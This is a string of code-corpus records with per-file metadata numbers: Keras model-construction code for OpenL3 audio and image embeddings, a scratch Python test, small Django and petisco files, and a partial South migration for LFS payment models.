frontend=frontend) def load_audio_embedding_model_from_path(model_path, input_repr, embedding_size, frontend='kapre'): """ Loads a model with weights at the given path. Parameters ---------- model_path : str Path to model weights HDF5 (.h5) file. Must be in format `*._<input_repr>_<content_type>.h5` or `*._<input_repr>_<content_type>-.*.h5`, since model configuration will be determined from the filename. input_repr : "linear", "mel128", or "mel256" Spectrogram representation used for audio model. embedding_size : 6144 or 512 Embedding dimensionality. frontend : "kapre" or "librosa" The audio frontend to use. If frontend == 'kapre', then the kapre frontend will be included. Otherwise no frontend will be added inside the keras model. Returns ------- model : tf.keras.Model Model object. 
""" frontend, input_repr = _validate_audio_frontend(frontend, input_repr) # Construct embedding model and load model weights with warnings.catch_warnings(): warnings.simplefilter("ignore") m = AUDIO_MODELS[input_repr](include_frontend=frontend == 'kapre') m.load_weights(model_path) # Pooling for final output embedding size pool_size = AUDIO_POOLING_SIZES[input_repr][embedding_size] y_a = MaxPooling2D(pool_size=pool_size, padding='same')(m.output) y_a = Flatten()(y_a) m = Model(inputs=m.input, outputs=y_a) m.frontend = frontend return m def get_audio_embedding_model_path(input_repr, content_type): """ Returns the local path to the model weights file for the model with the given characteristics Parameters ---------- input_repr : "linear", "mel128", or "mel256" Spectrogram representation used for model. content_type : "music" or "env" Type of content used to train embedding. Returns ------- output_path : str Path to given model object """ return os.path.join(os.path.dirname(__file__), 'openl3_audio_{}_{}.h5'.format(input_repr, content_type)) def load_image_embedding_model(input_repr, content_type, embedding_size): """ Returns a model with the given characteristics. Loads the model if the model has not been loaded yet. Parameters ---------- input_repr : "linear", "mel128", or "mel256" Spectrogram representation used for audio model. content_type : "music" or "env" Type of content used to train embedding. embedding_size : 8192 or 512 Embedding dimensionality. Returns ------- model : tf.keras.Model Model object. """ model_path = get_image_embedding_model_path(input_repr, content_type) return load_image_embedding_model_from_path(model_path, embedding_size) def load_image_embedding_model_from_path(model_path, embedding_size): """ Loads a model with weights at the given path. Parameters ---------- model_path : str Path to model weights HDF5 (.h5) file. embedding_size : 6144 or 512 Embedding dimensionality. 
input_repr : "linear", "mel128", or "mel256" Spectrogram representation used for audio model. content_type : "music" or "env" Type of content used to train embedding. embedding_size : 8192 or 512 Embedding dimensionality. Returns ------- model : tf.keras.Model Model object. """ # Construct embedding model and load model weights with warnings.catch_warnings(): warnings.simplefilter("ignore") m = _construct_image_network() m.load_weights(model_path) # Pooling for final output embedding size pool_size = IMAGE_POOLING_SIZES[embedding_size] y_i = MaxPooling2D(pool_size=pool_size, padding='same')(m.output) y_i = Flatten()(y_i) m = Model(inputs=m.input, outputs=y_i) return m def get_image_embedding_model_path(input_repr, content_type): """ Returns the local path to the model weights file for the model with the given characteristics Parameters ---------- input_repr : "linear", "mel128", or "mel256" Spectrogram representation used for model. content_type : "music" or "env" Type of content used to train embedding. Returns ------- output_path : str Path to given model object """ return os.path.join(os.path.dirname(__file__), 'openl3_image_{}_{}.h5'.format(input_repr, content_type)) def _construct_linear_audio_network(include_frontend=True): """ Returns an uninitialized model object for an audio network with a linear spectrogram input (With 257 frequency bins) Returns ------- model : tf.keras.Model Model object. """ weight_decay = 1e-5 n_dft = 512 n_hop = 242 asr = 48000 audio_window_dur = 1 if include_frontend: # INPUT input_shape = (1, asr * audio_window_dur) x_a = Input(shape=input_shape, dtype='float32') # SPECTROGRAM PREPROCESSING # 257 x 197 x 1 from kapre.composed import get_stft_magnitude_layer spec = __fix_kapre_spec(get_stft_magnitude_layer)( input_shape=input_shape, n_fft=n_dft, hop_length=n_hop, return_decibel=True, input_data_format='channels_first', output_data_format='channels_last') y_a = spec(x_a) else: # NOTE: asr - n_dft because we're not padding (I think?) 
input_shape = (n_dft // 2 + 1, int(np.ceil((asr - n_dft) * audio_window_dur / n_hop)), 1) x_a = y_a = Input(shape=input_shape, dtype='float32') y_a = BatchNormalization()(y_a) # CONV BLOCK 1 n_filter_a_1 = 64 filt_size_a_1 = (3, 3) pool_size_a_1 = (2, 2) y_a = Conv2D(n_filter_a_1, filt_size_a_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_1, filt_size_a_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_1, strides=2)(y_a) # CONV BLOCK 2 n_filter_a_2 = 128 filt_size_a_2 = (3, 3) pool_size_a_2 = (2, 2) y_a = Conv2D(n_filter_a_2, filt_size_a_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_2, filt_size_a_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_2, strides=2)(y_a) # CONV BLOCK 3 n_filter_a_3 = 256 filt_size_a_3 = (3, 3) pool_size_a_3 = (2, 2) y_a = Conv2D(n_filter_a_3, filt_size_a_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_3, filt_size_a_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_3, strides=2)(y_a) # CONV BLOCK 4 n_filter_a_4 = 512 filt_size_a_4 = (3, 3) y_a = Conv2D(n_filter_a_4, filt_size_a_4, padding='same', kernel_initializer='he_normal', 
kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_4, filt_size_a_4, kernel_initializer='he_normal', name='audio_embedding_layer', padding='same', kernel_regularizer=regularizers.l2(weight_decay))(y_a) m = Model(inputs=x_a, outputs=y_a) return m def _construct_mel128_audio_network(include_frontend=True): """ Returns an uninitialized model object for an audio network with a Mel spectrogram input (with 128 frequency bins). Returns ------- model : tf.keras.Model Model object. """ weight_decay = 1e-5 n_dft = 2048 n_mels = 128 n_hop = 242 asr = 48000 audio_window_dur = 1 if include_frontend: # INPUT input_shape = (1, asr * audio_window_dur) x_a = Input(shape=input_shape, dtype='float32') # MELSPECTROGRAM PREPROCESSING # 128 x 199 x 1 from kapre.composed import get_melspectrogram_layer spec = __fix_kapre_spec(get_melspectrogram_layer)( input_shape=input_shape, n_fft=n_dft, hop_length=n_hop, n_mels=n_mels, sample_rate=asr, return_decibel=True, pad_end=True, input_data_format='channels_first', output_data_format='channels_last') y_a = spec(x_a) else: input_shape = (n_mels, int(np.ceil(asr * audio_window_dur / n_hop)), 1) x_a = y_a = Input(shape=input_shape, dtype='float32') y_a = BatchNormalization()(y_a) # CONV BLOCK 1 n_filter_a_1 = 64 filt_size_a_1 = (3, 3) pool_size_a_1 = (2, 2) y_a = Conv2D(n_filter_a_1, filt_size_a_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_1, filt_size_a_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_1, strides=2)(y_a) # CONV BLOCK 2 n_filter_a_2 = 128 filt_size_a_2 = (3, 3) pool_size_a_2 = (2, 2) y_a = Conv2D(n_filter_a_2, filt_size_a_2, padding='same', 
kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_2, filt_size_a_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_2, strides=2)(y_a) # CONV BLOCK 3 n_filter_a_3 = 256 filt_size_a_3 = (3, 3) pool_size_a_3 = (2, 2) y_a = Conv2D(n_filter_a_3, filt_size_a_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_3, filt_size_a_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_3, strides=2)(y_a) # CONV BLOCK 4 n_filter_a_4 = 512 filt_size_a_4 = (3, 3) pool_size_a_4 = (16, 24) y_a = Conv2D(n_filter_a_4, filt_size_a_4, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_4, filt_size_a_4, kernel_initializer='he_normal', name='audio_embedding_layer', padding='same', kernel_regularizer=regularizers.l2(weight_decay))(y_a) m = Model(inputs=x_a, outputs=y_a) return m def _construct_mel256_audio_network(include_frontend=True): """ Returns an uninitialized model object for an audio network with a Mel spectrogram input (with 256 frequency bins). Returns ------- model : tf.keras.Model Model object. 
""" weight_decay = 1e-5 n_dft = 2048 n_mels = 256 n_hop = 242 asr = 48000 audio_window_dur = 1 if include_frontend: # INPUT input_shape = (1, asr * audio_window_dur) x_a = Input(shape=input_shape, dtype='float32') # MELSPECTROGRAM PREPROCESSING # 256 x 199 x 1 from kapre.composed import get_melspectrogram_layer spec = __fix_kapre_spec(get_melspectrogram_layer)( input_shape=input_shape, n_fft=n_dft, hop_length=n_hop, n_mels=n_mels, sample_rate=asr, return_decibel=True, pad_end=True, input_data_format='channels_first', output_data_format='channels_last') y_a = spec(x_a) else: input_shape = (n_mels, int(np.ceil(asr * audio_window_dur / n_hop)), 1) x_a = y_a = Input(shape=input_shape, dtype='float32') y_a = BatchNormalization()(y_a) # CONV BLOCK 1 n_filter_a_1 = 64 filt_size_a_1 = (3, 3) pool_size_a_1 = (2, 2) y_a = Conv2D(n_filter_a_1, filt_size_a_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_1, filt_size_a_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_1, strides=2)(y_a) # CONV BLOCK 2 n_filter_a_2 = 128 filt_size_a_2 = (3, 3) pool_size_a_2 = (2, 2) y_a = Conv2D(n_filter_a_2, filt_size_a_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_2, filt_size_a_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_2, strides=2)(y_a) # CONV BLOCK 3 n_filter_a_3 = 256 filt_size_a_3 = (3, 3) pool_size_a_3 = (2, 2) y_a = Conv2D(n_filter_a_3, filt_size_a_3, padding='same', 
kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_3, filt_size_a_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = MaxPooling2D(pool_size=pool_size_a_3, strides=2)(y_a) # CONV BLOCK 4 n_filter_a_4 = 512 filt_size_a_4 = (3, 3) y_a = Conv2D(n_filter_a_4, filt_size_a_4, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_a) y_a = BatchNormalization()(y_a) y_a = Activation('relu')(y_a) y_a = Conv2D(n_filter_a_4, filt_size_a_4, kernel_initializer='he_normal', name='audio_embedding_layer', padding='same', kernel_regularizer=regularizers.l2(weight_decay))(y_a) m = Model(inputs=x_a, outputs=y_a) return m def _construct_image_network(): """ Returns an uninitialized model object for a image network. Returns ------- model : tf.keras.Model Model object. 
""" weight_decay = 1e-5 im_height = 224 im_width = 224 num_channels = 3 x_i = Input(shape=(im_height, im_width, num_channels), dtype='float32') y_i = BatchNormalization()(x_i) # CONV BLOCK 1 n_filter_i_1 = 64 filt_size_i_1 = (3, 3) pool_size_i_1 = (2, 2) y_i = Conv2D(n_filter_i_1, filt_size_i_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = BatchNormalization()(y_i) y_i = Activation('relu')(y_i) y_i = Conv2D(n_filter_i_1, filt_size_i_1, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = Activation('relu')(y_i) y_i = BatchNormalization()(y_i) y_i = MaxPooling2D(pool_size=pool_size_i_1, strides=2, padding='same')(y_i) # CONV BLOCK 2 n_filter_i_2 = 128 filt_size_i_2 = (3, 3) pool_size_i_2 = (2, 2) y_i = Conv2D(n_filter_i_2, filt_size_i_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = BatchNormalization()(y_i) y_i = Activation('relu')(y_i) y_i = Conv2D(n_filter_i_2, filt_size_i_2, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = BatchNormalization()(y_i) y_i = Activation('relu')(y_i) y_i = MaxPooling2D(pool_size=pool_size_i_2, strides=2, padding='same')(y_i) # CONV BLOCK 3 n_filter_i_3 = 256 filt_size_i_3 = (3, 3) pool_size_i_3 = (2, 2) y_i = Conv2D(n_filter_i_3, filt_size_i_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = BatchNormalization()(y_i) y_i = Activation('relu')(y_i) y_i = Conv2D(n_filter_i_3, filt_size_i_3, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = BatchNormalization()(y_i) y_i = Activation('relu')(y_i) y_i = MaxPooling2D(pool_size=pool_size_i_3, strides=2, padding='same')(y_i) # CONV BLOCK 4 n_filter_i_4 = 512 filt_size_i_4 = (3, 3) pool_size_i_4 = (28, 28) y_i = Conv2D(n_filter_i_4, 
filt_size_i_4, padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) y_i = BatchNormalization()(y_i) y_i = Activation('relu')(y_i) y_i = Conv2D(n_filter_i_4, filt_size_i_4, name='vision_embedding_layer', padding='same', kernel_initializer='he_normal', kernel_regularizer=regularizers.l2(weight_decay))(y_i) m = Model(inputs=x_i, outputs=y_i) return m AUDIO_MODELS = { 'linear': _construct_linear_audio_network, 'mel128': _construct_mel128_audio_network, 'mel256': _construct_mel256_audio_network }
34.85444
120
0.645521
3,386
23,945
4.231246
0.082103
0.023592
0.01382
0.017589
0.803937
0.782648
0.776645
0.749913
0.728485
0.719271
0
0.037571
0.246356
23,945
686
121
34.905248
0.756345
0.208102
0
0.679901
0
0
0.065092
0.006929
0
0
0
0
0
1
0.037221
false
0
0.032258
0
0.1067
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
bc2d836e72de07e5028a1c83f17bd7847af4f7ff
393
py
Python
python_scripts/test.py
claraqin/CoursePath
715346441e9675fd181ba45aa3ac926e88b0be02
[ "MIT" ]
1
2019-12-18T18:57:52.000Z
2019-12-18T18:57:52.000Z
python_scripts/test.py
claraqin/CoursePath
715346441e9675fd181ba45aa3ac926e88b0be02
[ "MIT" ]
null
null
null
python_scripts/test.py
claraqin/CoursePath
715346441e9675fd181ba45aa3ac926e88b0be02
[ "MIT" ]
null
null
null
#test.py # d = {} # d['And'] = None # print('And' in d) # print(d['And']) # if 'And' in d and d['And']: # print('"And" in d and d["And"] is True') # else: # print('"And" in d and d["And"] is False') # if 'And' in d: # print('"And" in d is True') # else: # print('"And" in d is False') # e = {} # print('And' in e) # e['And'] = None # print('And' in e) # print(e['And']) print(max([]))
17.863636
44
0.503817
73
393
2.712329
0.191781
0.227273
0.353535
0.277778
0.651515
0.414141
0.348485
0.20202
0
0
0
0
0.21883
393
22
45
17.863636
0.644951
0.86514
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0
0
0
1
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
6
70acae2eb5979e25258fc52d04b5fc041e789724
79
py
Python
petisco/base/domain/ids/user_id.py
alice-biometrics/petisco
b96e697cc875f67a28e60b4fc0d9ed9fc646cd86
[ "MIT" ]
19
2019-11-01T09:27:17.000Z
2021-12-15T10:52:31.000Z
petisco/base/domain/ids/user_id.py
alice-biometrics/petisco
b96e697cc875f67a28e60b4fc0d9ed9fc646cd86
[ "MIT" ]
68
2020-01-15T06:55:00.000Z
2022-02-22T15:57:24.000Z
petisco/base/domain/ids/user_id.py
alice-biometrics/petisco
b96e697cc875f67a28e60b4fc0d9ed9fc646cd86
[ "MIT" ]
2
2019-11-19T10:40:25.000Z
2019-11-28T07:12:07.000Z
from petisco.base.domain.model.uuid import Uuid class UserId(Uuid): pass
13.166667
47
0.746835
12
79
4.916667
0.833333
0
0
0
0
0
0
0
0
0
0
0
0.164557
79
5
48
15.8
0.893939
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
70cd6cc9e5a57abd0624213d002a0c5c494489c6
140
py
Python
houses/admin.py
johnopana/Rental_App
a3be4dc8ef6e000af70b4e4561805f240b638298
[ "MIT", "Unlicense" ]
null
null
null
houses/admin.py
johnopana/Rental_App
a3be4dc8ef6e000af70b4e4561805f240b638298
[ "MIT", "Unlicense" ]
7
2020-02-28T12:00:44.000Z
2022-02-10T14:19:19.000Z
houses/admin.py
johnopana/Rental_App
a3be4dc8ef6e000af70b4e4561805f240b638298
[ "MIT", "Unlicense" ]
3
2020-02-27T10:33:53.000Z
2020-09-23T06:42:44.000Z
from django.contrib import admin from .models import * admin.site.register(Profile) admin.site.register(House) admin.site.register(Owner)
17.5
32
0.8
20
140
5.6
0.55
0.241071
0.455357
0
0
0
0
0
0
0
0
0
0.092857
140
7
33
20
0.88189
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.4
0
0.4
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
cb35402138f7ff515300a1ea328ba451fe73bbf7
29
py
Python
thinsos/__init__.py
mullenkamp/ThinSOS
3609f1f3b03390c3ebf33cb30da7a79cae85a890
[ "Apache-2.0" ]
null
null
null
thinsos/__init__.py
mullenkamp/ThinSOS
3609f1f3b03390c3ebf33cb30da7a79cae85a890
[ "Apache-2.0" ]
2
2019-04-24T20:18:13.000Z
2019-04-24T21:01:57.000Z
thinsos/__init__.py
mullenkamp/ThinSOS
3609f1f3b03390c3ebf33cb30da7a79cae85a890
[ "Apache-2.0" ]
null
null
null
from thinsos.core import SOS
14.5
28
0.827586
5
29
4.8
1
0
0
0
0
0
0
0
0
0
0
0
0.137931
29
1
29
29
0.96
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
cb6cde8d9c3e46ef91adc826e28d46a47293bb61
28,719
py
Python
lfs/payment/migrations/0001_initial.py
restless/django-lfs
4058f9d45b416ef2e8c28a87856ea0f1550b523d
[ "BSD-3-Clause" ]
1
2020-02-26T03:07:39.000Z
2020-02-26T03:07:39.000Z
lfs/payment/migrations/0001_initial.py
mxins/django-lfs
bf42ed80ce0e1ec96db6ab985adcc614ea79dfc8
[ "BSD-3-Clause" ]
null
null
null
lfs/payment/migrations/0001_initial.py
mxins/django-lfs
bf42ed80ce0e1ec96db6ab985adcc614ea79dfc8
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): depends_on = ( ("paypal.ipn", '0001_first_migration'), ("order", "0001_initial"), ) def forwards(self, orm): # Adding model 'PaymentMethod' db.create_table('payment_paymentmethod', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('active', self.gf('django.db.models.fields.BooleanField')(default=False)), ('priority', self.gf('django.db.models.fields.IntegerField')(default=0)), ('name', self.gf('django.db.models.fields.CharField')(max_length=50)), ('description', self.gf('django.db.models.fields.TextField')(blank=True)), ('note', self.gf('django.db.models.fields.TextField')(blank=True)), ('image', self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True)), ('tax', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['tax.Tax'], null=True, blank=True)), ('price', self.gf('django.db.models.fields.FloatField')(default=0.0)), ('deletable', self.gf('django.db.models.fields.BooleanField')(default=True)), ('module', self.gf('django.db.models.fields.CharField')(max_length=100, blank=True)), ('type', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)), )) db.send_create_signal('payment', ['PaymentMethod']) # Adding model 'PaymentMethodPrice' db.create_table('payment_paymentmethodprice', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('payment_method', self.gf('django.db.models.fields.related.ForeignKey')(related_name='prices', to=orm['payment.PaymentMethod'])), ('price', self.gf('django.db.models.fields.FloatField')(default=0.0)), ('priority', self.gf('django.db.models.fields.IntegerField')(default=0)), ('active', self.gf('django.db.models.fields.BooleanField')(default=False)), )) db.send_create_signal('payment', ['PaymentMethodPrice']) # Adding model 'PayPalOrderTransaction' 
db.create_table('payment_paypalordertransaction', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('order', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['order.Order'], unique=True)), )) db.send_create_signal('payment', ['PayPalOrderTransaction']) # Adding M2M table for field ipn on 'PayPalOrderTransaction' db.create_table('payment_paypalordertransaction_ipn', ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('paypalordertransaction', models.ForeignKey(orm['payment.paypalordertransaction'], null=False)), ('paypalipn', models.ForeignKey(orm['ipn.paypalipn'], null=False)) )) db.create_unique('payment_paypalordertransaction_ipn', ['paypalordertransaction_id', 'paypalipn_id']) def backwards(self, orm): # Deleting model 'PaymentMethod' db.delete_table('payment_paymentmethod') # Deleting model 'PaymentMethodPrice' db.delete_table('payment_paymentmethodprice') # Deleting model 'PayPalOrderTransaction' db.delete_table('payment_paypalordertransaction') # Removing M2M table for field ipn on 'PayPalOrderTransaction' db.delete_table('payment_paypalordertransaction_ipn') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': 
('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'catalog.deliverytime': { 'Meta': {'ordering': "('min',)", 'object_name': 'DeliveryTime'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'max': ('django.db.models.fields.FloatField', [], {}), 'min': ('django.db.models.fields.FloatField', [], {}), 'unit': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '2'}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'ipn.paypalipn': { 'Meta': {'object_name': 'PayPalIPN', 'db_table': "'paypal_ipn'"}, 'address_city': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}), 'address_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'address_country_code': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'address_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}), 'address_state': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}), 'address_status': ('django.db.models.fields.CharField', [], {'max_length': '11', 'blank': 'True'}), 'address_street': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}), 'address_zip': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}), 'amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'amount1': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'amount2': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'amount3': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'amount_per_cycle': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'auction_buyer_id': 
('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'auction_closing_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'auction_multi_item': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}), 'auth_amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'auth_exp': ('django.db.models.fields.CharField', [], {'max_length': '28', 'blank': 'True'}), 'auth_id': ('django.db.models.fields.CharField', [], {'max_length': '19', 'blank': 'True'}), 'auth_status': ('django.db.models.fields.CharField', [], {'max_length': '9', 'blank': 'True'}), 'business': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'case_creation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'case_id': ('django.db.models.fields.CharField', [], {'max_length': '14', 'blank': 'True'}), 'case_type': ('django.db.models.fields.CharField', [], {'max_length': '24', 'blank': 'True'}), 'charset': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'contact_phone': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}), 'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'currency_code': ('django.db.models.fields.CharField', [], {'default': "'USD'", 'max_length': '32', 'blank': 'True'}), 'custom': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}), 'exchange_rate': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 